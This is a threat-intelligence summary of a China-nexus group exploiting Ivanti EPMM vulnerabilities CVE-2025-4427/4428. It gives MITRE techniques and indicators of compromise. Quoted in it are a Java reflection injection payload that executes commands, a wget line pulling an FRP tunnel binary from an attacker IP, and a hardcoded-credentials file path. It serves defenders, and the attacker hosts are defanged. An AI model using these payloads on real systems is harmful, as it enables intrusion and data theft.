Threat Research

Chinese Threat Actor Exploiting Ivanti EMM Vulnerability

Eclecticiq
Chinese Threat Actor Exploiting Ivanti EMM Vulnerability

Two critical vulnerabilities (CVE-2025-4427 and CVE-2025-4428) in Ivanti Endpoint Manager Mobile (EPMM) have been actively exploited by a China-nexus espionage group, enabling unauthenticated remote code execution and widespread data exfiltration. The threat actors deployed KrustyLoader malware and leveraged AWS S3 buckets for payload delivery while targeting organizations across multiple critical sectors globally. #IvantiEPMM #KrustyLoader #AutoColor #ChinaNexusEspionage

Keypoints

  • Ivanti disclosed two critical vulnerabilities (CVE-2025-4427 and CVE-2025-4428) in Endpoint Manager Mobile (EPMM) 12.5.0.0 and earlier, enabling unauthenticated remote code execution.
  • Active exploitation by a China-nexus espionage group has targeted internet-facing Ivanti EPMM systems since May 15, 2025, affecting sectors such as healthcare, telecommunications, and government globally.
  • Threat actors exploited the /mifs/rs/api/v2/ endpoint using Java Reflection to execute arbitrary commands and establish reverse shells for persistent access.
  • KrustyLoader malware was deployed via compromised AWS S3 buckets and used to load an AES-encrypted Sliver backdoor directly into memory for covert persistence.
  • Actors accessed the mifs database with hardcoded MySQL credentials to exfiltrate sensitive information including PII, LDAP data, and Office 365 tokens for lateral movement and espionage.
  • A Fast Reverse Proxy (FRP) tool was installed to enable internal network reconnaissance and lateral movement within compromised environments.
  • Indicators link the attacks to known China-nexus infrastructures and the usage of Auto-Color Linux backdoor command-and-control infrastructure.

MITRE Techniques

  • [T1210] Exploitation of Remote Services – Exploited unauthenticated remote code execution vulnerabilities in Ivanti EPMM’s /mifs/rs/api/v2/ endpoint using Java Reflection commands to gain initial access (‘${“”.getClass().forName(“java.lang.Runtime”).getMethod(“getRuntime”).invoke(null).exec(“REMOTE-COMMAND”).waitFor()}’).
  • [T1059] Command and Scripting Interpreter – Used reflective Java expressions to execute system commands and read output for command-and-control communications (‘${“”.getClass().forName(“java.util.Scanner”).getConstructor…’).
  • [T1105] Ingress Tool Transfer – Downloaded malware payloads using wget, curl, and fetch utilities from public AWS S3 buckets (‘openrbf.s3.amazonaws.com’, ‘tkshopqd.s3.amazonaws.com’).
  • [T1547] Boot or Logon Autostart Execution – Achieved persistence by executing KrustyLoader and decrypting Sliver backdoor payloads directly in memory.
  • [T1005] Data from Local System – Extracted sensitive data including IMEI, phone numbers, and authentication tokens from the mifs database using hardcoded MySQL credentials (‘/mi/files/system/.mifpp’).
  • [T1021] Remote Services – Installed and used Fast Reverse Proxy (FRP) to establish a persistent reverse proxy tunnel for network reconnaissance and lateral movement (‘wget http://103.244.88[.]125:8080/frpc -o /tmp/.alog’).
  • [T1560] Archive Collected Data – Dumped memory heap and exported database contents to files disguised as JPG images for exfiltration (‘whoami > /mi/tomcat/webapps/mifs/images/Hq8weo.jpg’).
  • [T1071] Application Layer Protocol – Utilized DNS tunneling through ns1.cybertunnel[.]run for communication and data exfiltration.

Indicators of Compromise

  • [IP Address] Malicious infrastructure – 103.244.88[.]125 (hosted FRP binary), 27.25.148[.]183 (China-hosted used in prior SAP NetWeaver exploitation), 146.70.87.67:45020 (Auto-Color C2 server), 124.223.202[.]90 (Tencent Cloud backend for DNS tunneling).
  • [File Hash] KrustyLoader samples – 44c4a0d1826369993d1a2c4fcc00a86bf45723342cfd9f3a8b44b673eee6733a, 7a4e0eb5fbab9709c8f42beb322a5dfefbc4ec5f914938a8862f8e26a31d30a5, and 2 more hashes.
  • [File Hash] Decrypted Sliver backdoor sample – 29ae4fa86329bf6d0955020319b618d4c183d433830187b80979d392bf159768.
  • [File Hash] Malicious Linux Bash scripts used for MySQL dumping – 64764ffe4b1e4fc5b9fe27b513e02f0392f659c4e033d23a4ba7a3b7f20c6d30, b422645db18e95aa0b4daaf5277417b73322bed306f42385ecfd6d49be26bfab.
  • [Domain] AWS S3 buckets used to deliver KrustyLoader – openrbf.s3.amazonaws[.]com, tnegadge.s3.amazonaws[.]com, fconnect.s3.amazonaws[.]com, trkbucket.s3.amazonaws[.]com, the-mentor.s3.amazonaws[.]com, tkshopqd.s3.amazonaws[.]com.
  • [Domain] Staging URL for encrypted Sliver backdoor – http://abbeglasses.s3.amazonaws[.]com/dSn9tM.
  • [Domain] Hosting for malicious script used in database dumping – https://dpaste[.]com/9MQEJ6VYR.txt.
  • [Domain] DNS tunneling nameserver – ns1.cybertunnel[.]run (associated with Yak Bridge service).

Read more: https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint